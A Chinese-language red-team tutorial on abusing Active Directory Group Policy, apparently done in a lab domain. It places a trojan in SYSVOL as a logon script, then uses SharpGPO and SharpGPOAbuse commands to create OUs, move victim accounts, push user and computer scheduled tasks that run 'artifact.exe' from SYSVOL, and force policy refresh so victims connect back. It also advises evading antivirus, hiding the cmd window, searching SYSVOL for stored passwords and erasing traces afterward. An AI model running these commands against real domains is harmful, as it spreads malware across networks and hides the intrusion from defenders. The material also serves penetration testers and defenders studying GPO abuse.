域渗透实战下-gpo策略利用

参考

https://redn3ck.github.io/2018/03/01/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%9F%9F%E6%8E%A7%E4%B8%8B%E5%8F%91%E6%96%87%E4%BB%B6%E5%B9%B6%E6%89%A7%E8%A1%8C%E8%BF%9C%E6%8E%A7/

https://xz.aliyun.com/t/9511

http://www.ttk7.cn/post-136.html

注意点

计划任务 每次需要删除计划的配置文件 ,更改任务名 重新下发文件,计划任务的文件路径放在sysvol目录下

startup 重启登录 文件必须放在 gpo配置的指定目录下

如果有修改sysvol的权限 可以尝试替换 Startup 以及 计划任务的配置文件

Gpp策略

域内的组策略,在创建gpo之后,可以设置 执行命令的功能,适用于在有适当的域控制权限针对特定目标机器进行执行命令或者批量下发命令的功能

所有的域策略保存在

SYSVOL

解决办法之一是为认证数据采取SYSVOL,SYSVOL是AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据,这是因为SYSVOL能在所有域控里进行自动同步和共享。

\<domain>\SYSVOL\<domain>\Policies\</domain></domain>

环境

dc1
windows7

SYSVOL下存放的域策略配置

SYSVOL 下可能会存放密码策略,本地管理员账户,网站账户的一些策略配置,在权限拓展失败的情况下可以尝试翻阅SYSVOL下的目录可能会有域内的一些配置脚本保存信息

wKg0C2LtBCqAX2UwAAB1ozrRYXc009.png

wKg0C2LtBEOAZ4nkAACCHrk5tAg323.png

User (Ou组内用户登录后相关脚本进行的命令执行)

Machine (机器重启运行后相关脚本进行的命令执行)

登录域控通过域策略进行命令执行

新建OU

新建OU 添加目标机器,或者用户,这里我以受害机器 windows7 用户 zhu 进行演示

新建组织单位 信息部

wKg0C2LtBGyAcfCFAADSeXvV8yI821.png

将原技术部 zhu 以及用户计算机移动到Ou信息部下

wKg0C2LtBJWAMn96AACJTCVjwqA128.png

wKg0C2LtBK2ATpxmAAB9fP2cAgE062.png

运行gpmc.msc 进行组策略配置

wKg0C2LtBMmATe2oAAA9TiYGdt8746.png

在这个域中创建gpo 我们命名gptest

wKg0C2LtBOKAABJKAACuqP6BcY044.png

在 gptest 右键编辑

wKg0C2LtBP2ALQ0OAACO8JV19dQ653.png

我们来设置登录脚本

wKg0C2LtBRKALVSNAACC5xFMSM024.png

这里我们以用户进行配置 -》Windows设置-》脚本登录

wKg0C2LtBSaAU9aAADrD0axvSc851.png

点击显示文件,将生成的木马 放入显示文件的目录里,然后点击添加脚本就行

wKg0C2LtBUCANaQ4AABa6IJF4Gc689.png

wKg0C2LtBVeAL6aNAABlNCxXhU565.png

wKg0C2LtBXGAZnowAACAFvcWJWg167.png

组策略创建好后然后在ou右键选择链接到现有的GPO

wKg0C2LtBYOAO1veAADJVmdlpfk650.png

wKg0C2LtBZWAOKJxAAAI9u6PJWo620.png

我们在域控刷新一下域策略在windows7机器

powershell Invoke-GPUpdate -Computer windows7.kdc.com -RandomDelayInMinutes 0

重启登录受害用户

wKg0C2LtBaAUpQjAABw0Jy7GFg490.png

wKg0C2LtBpuATpy1AAIgoTjoXo582.png

wKg0C2LtBraAPIx1AAANopxzp7g299.png

计划任务执行

这种方法在组策略不需要用户重启电脑在Startup过程中执行任务,直接在运行过程中刷新组策略即可

具体方法在组策略里的用户配置-》首选项-》控制面板-》计划任务

wKg0C2LtBsiACjPRAADxE9bdY48710.png

这里就不演示了,需要注意的是执行路径,需要受害机器能够访问到

不登录进行组策略下发执行

使用工具如下

https://github.com/FSecureLABS/SharpGPOAbuse
https://github.com/Dliv3/SharpGPO

具体用法参照 readme ,落地注意免杀

新建ou

SharpGpo.exe --Action NewOU --OUName "IT"

wKg0C2LtBwCAXOX6AAA8IgxVQaU397.png

移动信息部下x用户到IT组下面

SharpGpo.exe --Action MoveObject --SrcDN "CN=x,OU=信息部,DC=kdc,DC=com" --DstDN "OU=IT,DC=kdc,DC=com"

wKg0C2LtBwAHLnAABCUPGTxxI529.png

wKg0C2LtByyAeg6uAACJ96yNA5o210.png

再将Administrators电脑移动到IT组下

SharpGpo.exe --Action MoveObject --SrcDN "CN=administrator,OU=技术部,DC=kdc,DC=com" --DstDN "OU=IT,DC=kdc,DC=com"

wKg0C2LtB0GAUNBbAABQZDPzYYo748.png

创建GPo pergpo

SharpGpo.exe --Action NewGPO --GPOName pergpo

wKg0C2LtB1qAPPS7AABwgXptf0215.png

sysvol下会出现策略配置信息

wKg0C2LtB2mAYXmHAADVCRTkk1s736.png

现在我们添加一个计划任务 来使目标机器或者用户上线

由于目标机器执行计划任务是以本地文件路径执行,所以我们要把木马文件放置在 目标机器可以访问的目录,sysvol目录是域内机器都可以访问到的目录我们可以把木马放置在该目录下

\kdc.com\SysVol\kdc.com\scripts****

注:执行时需要cmd /c start否则开机会有cmd窗口

添加用户计划任务

SharpGPOAbuse.exe --AddUserTask --TaskName "tu" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c start \\dc1\\SysVol\\kdc.com\\scripts\\artifact.exe" --GPOName "pergpo"

添加机器计划任务

SharpGPOAbuse.exe --AddComputerTask --TaskName "tu" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c start \\dc1\\SysVol\\kdc.com\\scripts\\artifact.exe" --GPOName "pergpo"

wKg0C2LtB4GANe24AAB1cVV2ZP4426.png

(注意这里 计划任务会在sysvol目录下存放一个计划任务配置的xml,每次换新的计划任务时需要删除掉此gpo下的计划配置文件。并重新下发计划任务,并重新更换任务名)

wKg0C2LtB5WAJGyzAAA1M5wxz0713.png

将GPlink 链接到目标ou下

SharpGpo.exe --Action NewGPLink --DN "OU=IT,DC=kdc,DC=com" --GPOName pergpo

wKg0C2LtB6WAEy8zAABXoUWS8t8629.png

刷新域策略上线

powershell Invoke-GPUpdate -Computer dc1.kdc.com -RandomDelayInMinutes 0

wKg0C2LtB7SARAhiAAAR665HZXU825.png

清理痕迹

删除gplink 链接

SharpGPO.exe --Action RemoveGPLink --DN "OU=IT,DC=kdc,DC=com" --GPOName pergpo

wKg0C2LtB8uACriNAABdK7oIZ3w128.png

删除gpo 或者可以直接删除sysvol 目录下

SharpGPO.exe --Action RemoveGPO --GPOName pergpo

移动ou 到原来目录 x administrator 科技部

SharpGpo.exe --Action MoveObject --SrcDN "CN=Administrator,OU=IT,DC=kdc,DC=com" --DstDN "OU=技术部,DC=kdc,DC=com"

wKg0C2LtB9uAKBw0AABaEVcAH1Y219.png

删除ou IT

SharpGpo.exe --Action RemoveOU --OUName "IT"

wKg0C2LtBKAXFY7AABRNYrmgPE229.png

end

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐